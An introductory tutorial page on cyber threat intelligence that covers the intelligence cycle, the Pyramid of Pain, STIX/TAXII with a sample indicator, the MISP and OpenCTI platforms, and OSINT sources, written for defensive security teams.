Cyber Threat Intelligence (CTI) - WhoisNexus Academy

"Data is not Intelligence." A list of 10,000 bad IP addresses is Data. Knowing that "APT29 is targeting financial institutions in Germany using a specific PDF exploit" is Intelligence. CTI is the process of collecting, analyzing, and disseminating information about threats to empower better decision-making.

The Pyramid of Pain

David Bianco's Pyramid of Pain illustrates the value of CTI.
Bottom (Easy): Hash Values, IP Addresses. Trivial for attackers to change.
Top (Hard): TTPs (Tactics, Techniques, and Procedures). If you detect the behavior (e.g., they always use PowerShell at 3 AM), you force them to reinvent their entire tradecraft.

1. The Intelligence Cycle

CTI follows a military-grade lifecycle:

Direction: The CISO asks: "Are we vulnerable to the new Ransomware hitting hospitals?"
Collection: Gathering raw logs, Dark Web forum posts, OSINT, and paid feeds.
Processing: Normalizing data (JSON/CSV) into a standard format (STIX).
Analysis: connecting dot. "This IP belongs to the same subnet used in the SolarWinds attack."
Dissemination: Delivering the report to the Firewall team (block the IP) and the Board (approve budget for new XDR).
Feedback: Did the intelligence help? Refine the requirements.

2. Levels of Intelligence

Level	Audience	Example
Strategic	Board / C-Suite	"Ransomware attacks in our sector increased 200%. We need cyber insurance."
Operational	SOC Manager / IR Lead	"Group X involves social engineering via LinkedIn. Alert HR."
Tactical	SOC Analyst / Firewall Admin	"Block IP 1.2.3.4 and Hash a1b2c3..."

3. Standards: STIX & TAXII

To share intelligence automatically between machines (e.g., from the Government to your Bank), we need a common language.

3.1. STIX (Structured Threat Information Expression)

A JSON schema to describe threats. Instead of saying "Bad IP", we say:

{
  "type": "indicator",
  "name": "Malicious IP used by Lazarus Group",
  "pattern": "[ipv4-addr:value = '198.51.100.1']",
  "valid_from": "2023-01-01T00:00:00Z",
  "labels": ["malicious-activity"]
}
        

3.2. TAXII (Trusted Automated Exchange of Intelligence Information)

The transport layer (HTTPS API) to send the STIX data. Think of STIX as the package and TAXII as the truck delivering it.

4. Tools: MISP & OpenCTI

You need a platform to store this data.

4.1. MISP (Malware Information Sharing Platform)

The industry standard (Open Source). It allows organizations to share "Events". If Bank A gets hacked, they upload the IoCs to MISP. Bank B (connected to the same MISP instance) automatically blocks those IoCs before they get hit. This is Herd Immunity.

4.2. OpenCTI

A modern, graph-based platform. It visualizes relationships. "This File -> connected to -> This IP -> owned by -> This Threat Actor." It helps analysts see the bigger picture.

5. OSINT (Open Source Intelligence)

90% of intelligence is public. You just have to find it.

Shodan: "Show me all servers in Russia running vulnerable Exchange versions."
VirusTotal: "Who else has seen this malware hash?"
Twitter (Infosec): Researchers often publish Zero-Days on Twitter hours before vendors release patches.

The Golden Rule

Intelligence must be ACTIONABLE. If you give the firewall team a list of 1 million IPs to block, they will ignore you. If you give them 5 IPs that are definitely attacking the company right now, they will thank you. Quality over Quantity.